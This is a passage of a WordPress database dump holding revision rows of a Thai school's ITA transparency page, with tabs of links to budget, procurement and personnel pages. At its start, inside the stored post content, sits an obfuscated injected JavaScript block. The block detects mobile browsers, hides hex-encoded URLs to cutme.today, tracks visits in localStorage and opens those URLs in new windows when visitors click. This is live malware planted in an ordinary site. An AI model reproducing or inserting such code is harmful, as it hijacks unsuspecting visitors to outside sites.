u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-21 10:02:27','2024-08-21 03:02:27','',871,'http://pakhaeng.ssk.in.th/?p=1040',0,'revision','',0),
(1042,1,'2024-08-21 10:03:22','2024-08-21 03:03:22','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"currentTab\":7,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-7 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- 